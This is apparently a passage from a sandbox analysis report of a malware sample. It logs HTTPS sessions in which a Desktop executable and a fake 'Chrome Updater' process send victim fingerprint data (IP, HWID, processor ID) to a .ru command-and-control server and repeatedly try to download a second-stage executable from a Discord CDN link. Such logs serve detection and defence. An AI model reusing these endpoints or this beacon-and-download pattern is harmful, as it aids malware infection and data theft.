                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4hiWGORJWu%2Fu5GwzZ3AFyHyfmuV%2FHDVsXUYL7wewbWsSh5gGqqp6mfYEda%2BbhDPMxwz%2FJRpL8%2FrtsOhftx5CieYcXZBIIisH9k%2BuhP12bFvHBQQTGoQa0t3%2F6%2Fsp5PSIkGTVDIZW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c831da773944-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:27 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    194192.168.2.649919162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:27 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:27 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:27 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8337ba37faa-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 49
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:27 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=4v7acpoSV3VfMpkr2OUDkM1pLzSmYUEqJ.GBDAX3rYs-1704353487-1-ATkYN/52L7v9yKdY/nUqlQt2KMxdW6AM/WPpKdu4HU9QFtQDhl0KrwxFrwdvLMi9Hha55z4K0yyreLkgFlEx0qU=; path=/; expires=Thu, 04-Jan-24 08:01:27 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MnWLCMcFkU38ioMz9fTtCr7EH5rNFkYf0Kw1P%2FvKwW1Q4W3XHLiKJ%2BXq%2BCba62PAneIufJoZyPKscy9cCPdwwlVh5RI1BxYmQDWBi5zfSXQ3hw9YylKVnYT2acMKXHnyTMHwHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=Lb0GiPVzdzTIcFBQ0k8jyDlngxgwlaVLPONtfmAgXxk-1704353487955-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:27 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
                                                                                    2024-01-04 07:31:27 UTC207INData Raw: 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 'UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    195192.168.2.649920104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:28 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:28 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kPwfQUUHnmgdq8e6%2FgWwp4eFKL1o%2FerljwBflf8bpzp5ZBVCoCC%2Bi4ZxULxk%2B2dT%2F5ZRMjuYP71TgZoe4shRrp8Ui9a77uJFI4vaQlIcnJsl7naUF6JJ0VKhPvqrT6dIhr94rvcu"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c83649692063-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:28 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    196192.168.2.649921104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:28 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:29 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:28 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o%2BSWqAsuaTkEvg%2F%2BCrePWOb8W14IMuiJCa266n0F0safLB5zK3fliVJuSI6nNz63VkFcUcSNQxiNxF0bHD64WcnQsA33xm5DTKHtZ0Z9tnagqHcaGxQn5eJ85Fj77mEiWDdF83Sb"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8371e1c2027-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:29 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    197192.168.2.649922162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:29 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:29 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:29 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c83bddb33b2c-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 73
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:29 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=RCcTchSgsiJscI0NCcNei.TfDg5VQGKODTMpyuiMpKM-1704353489-1-AZeINDBuVU/ybODilLYETTL+5vFA87XVtpH/cqISZO/SVW7ya+CVBRyUpO2Llg7T7niVog2Rcn5r5vmPwGPxaXw=; path=/; expires=Thu, 04-Jan-24 08:01:29 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AiJnYdc8XJH7llUQx5vbz78t%2F2X4pY7qTUGhUDVpAKHDmRrYzrZdiLHhbW0QA8UAHpPjYYoVqV%2F%2FvNLbp2ldP9WHyFDFtiYc0bKkNl5fSAN9TrEH9uNSEBlRf%2B05eyVnCM2fDQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=f69lUhCY.gtVVYM5k49AnoZsijRQGX09R1._MAwWX6Q-1704353489278-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:29 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:29 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    198192.168.2.649923104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:29 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:29 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:29 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMSu5oXYogIEzV9WIMPKDhOHGUb5%2Bw6W1rOcxTVwR7H2I7J6lRYMMtc08JSdnz4kb9vmAq4A%2Fbba1yxm8Lh5axMI%2BaQgabnt%2BZNXvtjYctAvi1p5EI7eqXrx%2FQtyFhVjJZ3tCsVR"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c83cd8a13880-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:29 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    199192.168.2.649924104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:29 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:30 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TyzRwcQwsen8O2FP%2FyWbQAOJ6oD751xW3PFaMIJ5PSItGrepVaofctjnJItDQph9TwR%2FCPVgH4iT%2FBCMDNp1uDyFnqzoBbjOge%2Fya1gNk4Jaa1StGTmdPxaw3GrZ1ZTCIEQ7js2V"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c83f8ff907df-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:30 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    200192.168.2.649925162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:30 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:30 UTC1331INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:30 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c842693f394a-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 65
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:30 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=hTxwQ4TK3GR.d8y72RcktBHzNbB8A_Qzr2oha6KPhQM-1704353490-1-AbJ8sj9DqZcfhKSsyQ7Qvd+/zA53bIZKbqQi3xZjjZ4IQOqEfTm+rtL5kuAOU3wxFD36x5MAJOKNjPoJDzHnjzM=; path=/; expires=Thu, 04-Jan-24 08:01:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pp9H04kNW%2FpM8fOpGfAH9nGnhyIFl79Y0ovCT0XlObjdod7PlW91K3KRKCIfVx4q%2FoOKG8EvffdQANLTkXewqaEPQnWeoo3MNaXl3LjhC4sCUxvD4b1OBL5PZxyQ5C0pXJFUeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=K8K61s3QgkWYh8oT1UjrX2m4Qy6IhPIGJPB09ensB9U-1704353490323-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:30 UTC38INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?>
                                                                                    2024-01-04 07:31:30 UTC198INData Raw: 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    201192.168.2.649926104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:30 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:31 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SOS83mPQE45DHATotgyGkJXmqAR7a7sxpgev23k8FKgRmJyCyD8gJcfcVCktldlCPugHgDTE285PJ9EKe7j1JT2cJDT4C4lc6eoO1Oqk7E%2F%2B9lzaM2faoHsakmIF9PERv%2F1lwWFL"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8451ec7819d-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:31 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    202192.168.2.649927104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:30 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:31 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k7lH%2FM1VIn24%2FXQ5g5hNm4FQeZTruGIPpEfoDyD8bjhGYOQiZztnq%2Bib%2BOO%2BhbV7yzpTLtRQLFLJqdfif55I5EWZx3rDLJoZm5PmBXkEVJbMG5wOI8dT481dOE1gCogqtZXgk1Oi"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c845ea3b7fd5-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:31 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    203192.168.2.649928162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:31 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:31 UTC1339INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:31 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c849693b0623-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 75
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:31 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=I9271HWbz4sk75xKcN1rHLvGxh82nMP_lxU8eQuCPho-1704353491-1-AcCYVMDr0b7nWpJ4l8FKpbRHDaMYwc2M7iWaa1zOr6uTdNLgKeqFk77psSszoDpvqoA6Plpc/QUOCXk/HPxhKKY=; path=/; expires=Thu, 04-Jan-24 08:01:31 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J4R%2Bm9581it%2BgFn82I8vcjLeqQuTYN4jkoU16gdTFC%2BoaeKSd2cHDZ%2FV4lTqHAanlLUHRkKTEn5m7V%2BZbsni9kpzhpB%2Be6nW5G5frr9QnTGlGDxoP2zcVuhnFV41lmK7nlJ8RQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=sscuslw.o3RRi4Bk4DBDgBSesRbQ03vhOlyUe7mvHYw-1704353491447-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:31 UTC30INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27
                                                                                    Data Ascii: <?xml version='1.0' encoding='
                                                                                    2024-01-04 07:31:31 UTC206INData Raw: 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    204192.168.2.649929104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:31 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:32 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CAfk24e12GwY5hj82zjcj8k4Ii8IpLyQluyZH1FprVDc5oJ8E4fHd5bE3sNsyFfp2cQ6dxVCMEdrO80lONX6oK7g3QvBoT9kpLY2ZlJSfJlsXk%2F6M%2BaXx5Vq%2FlSh%2Flbz3rdI4jmf"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c84a4c061fdc-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
